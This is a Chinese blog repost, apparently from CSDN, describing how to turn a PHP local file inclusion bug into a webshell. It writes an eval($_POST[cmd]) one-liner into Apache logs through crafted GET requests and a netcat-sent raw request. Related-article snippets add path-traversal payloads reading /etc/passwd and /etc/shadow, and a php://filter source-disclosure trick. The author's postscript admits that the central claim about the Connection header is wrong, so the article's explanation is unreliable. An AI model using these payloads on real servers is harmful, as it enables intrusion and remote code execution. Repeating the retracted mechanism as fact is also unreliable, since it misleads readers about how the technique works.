php本地文件包含漏洞,邪恶的空格-PHP本地文件包含漏洞的新突破口

最新推荐文章于 2022-07-27 09:10:13 发布
最新推荐文章于 2022-07-27 09:10:13 发布
阅读量115 收藏
点赞数
文章标签: php本地文件包含漏洞

来源:茄子乱语

PS:文章说的出错鸟,事后剑心提醒我才发现,有忽悠人的嫌疑,Connection HTTP标头和能不能写入空格无关!!

记得Zizzy写过一篇《关于php包含Apache日志的随想》,这是一个很好的思路,我们可以随意构造

http://www.exp.com/index/**/eval($_POST[cmd]);/**/?>.php

这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:

http://www.milw0rm.com/exploits/4029

不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将不支持/**/eval($_POST[cmd]);/**/?>这样的短语句.

所以我们只能使用<?php eval($_POST[cmd]);?>这样标准语法的一句话木马,但是问题来鸟,语句中有一个空格,类似

http://www.exp.com/index<?php eval($_POST[cmd]);?>.php

这样的提交,WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php %20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

哈,上面说的牛牛可以略过,下面开始切入正题,我们知道一般情况下,一旦Web服务器向浏览器发送了请求数据,肯定会返回响应,这里我发现了WEB服务器一个奇怪的特性,就是如果没有返回响应而WEB服务器又接受了请求,那么请求的内容将原封不动的写入WEB日志,不会进行HTTP编码.

这样我们想个办法一直与WEB服务器保持TCP连接,不让WEB服务器处理响应返回,然后再由客户端的我们中断这次TCP连接,说得这么复杂其实很容易实现.只要在HTTP请求的数据包中去掉Connection HTTP标头值。

利用NC伪造没有Connection HTTP标头的请求包:

GET /index< >.php HTTP/1.1

Accept: */*

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Host: 192.168.3.44

你会发现WEB服务器一直不会返回响应,直到我们客户端断开这次连接,这个邪恶的空格便写入了WEB日志!

漫无限
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞
qq_52016943的博客
08-17 2237
文件包含漏洞
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含php 中,涉及到的危险函数有四个,分别是 inclu...
PHP文件包含漏洞总结
坚持硬核
10-07 3268
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1879
文件包含漏洞整理与历史漏洞分析
超详细本地文件包含漏洞详解(小白也能懂!)
weixin_39670937的博客
07-05 1488
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然...
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1039
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
PHPvod视频点播系统 2.6 for php5.3.x utf-8.rar
05-24
Phpvod从创立之初即以提高产品效率为突破口,随着编译模板,数据缓存等技术的应用,和坚固的数据结构及最少化数据库查询设计,使得PHPvod 可以在极为繁忙的服务器环境下快速稳定运行,切实节约网站成本。 支持用户...
PHPvod视频点播系统 2.6 for php5.2.x utf-8.rar
05-24
Phpvod从创立之初即以提高产品效率为突破口,随着编译模板,数据缓存等技术的应用,和坚固的数据结构及最少化数据库查询设计,使得PHPvod 可以在极为繁忙的服务器环境下快速稳定运行,切实节约网站成本。 支持用户...
红队版Goby-poc438个自定义goby-poc
08-10
无论是对于防御者进行漏洞修补,还是对于攻击者寻找突破口,了解并掌握这些POC都是非常有价值的。 在实际操作中,如果没有红队版的Goby-poc,用户可以直接将这些自定义POC导入到Goby框架的POC管理模块,进行批量...
浅谈一次与sql注入 & webshell 的美丽“邂逅”
01-19
金融公司的业务实在是太引人耳目,何况我们公司的业处正处于风口之上(区块链金融),并且每天有大量现金交易,所以不知道有多少躲在暗处一直在盯着你的系统,让你防不胜防,并且想方设法的找到突破点,以达到的目的...
php 伪造本地文件包含漏洞的代码
01-21
代码: 复制代码 代码如下: <?php $page=$_GET[‘page’]; include($page.’php’); ?> 你可以这样使用 http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.php?page=../../../etc/passwd http://www.xxx.com/index.php?page=…./../etc/passwd 获取更多数据: etc/profile etc/services /etc/passwd /etc/shadow /etc/group /et
PHPMyWind CMS v5.6 beta.zip
07-06
因此,我们总结上述几点是企业建站开发者们最需要的几点需求,以此为突破口,开发过程中时刻遵循于此。我们希望,开发者在开发的过程中感觉快速、舒适,这是我们的追求。 PHPMyWind 从2010年开发至今已有2年时间,...
PHP文件包含漏洞详解
xysoul的专栏
06-30 1万+
http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以
【CTF】LFI漏洞总结(PHP本地文件包含漏洞
HAPPY
07-31 1万+
学习链接: https://www.cnblogs.com/wh4am1/p/6542398.html   发现地址后面的参数直接使用的文件包含。  ?file=show.php 为了查看index.php的源文件, 可以使用下面的命令: rlfi.php  ?language=php://filter/read=convert.base64-encode/resource=index.p...
php本地文件包含漏洞,php本地文件包含漏洞
weixin_31925495的博客
03-09 416
溢 出服务器的后台处理程序,如图片解析模块;或者上传一个合法的文本文件,其 内容包含了 PHP 脚本,再通过”本地文件包含漏洞(Local File Include)”执行 此脚本;......文件包含漏洞 文件包含漏洞简介服务器通过php的特性(函数)去包含任意文件时,由...? 代码本地/远程包含漏洞:应用程序直接包含了用户可控的上传文件 或远程文件(URL引用文件),就会触发此漏洞,比如ph...
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9203
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
udp分片报文pcap文件
最新发布
07-18
udp分片报文pcap文件:64kudp大包分成每片658字节总计100片
深入理解PHP文件包含漏洞:原理、利用与防御
本地文件包含漏洞允许攻击者通过操纵变量来包含服务器上的任意文件,而远程文件包含漏洞则允许攻击者通过变量包含网络上的任何可访问文件,这通常导致更严重的安全风险,因为攻击者可以执行远程服务器上的恶意代码。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值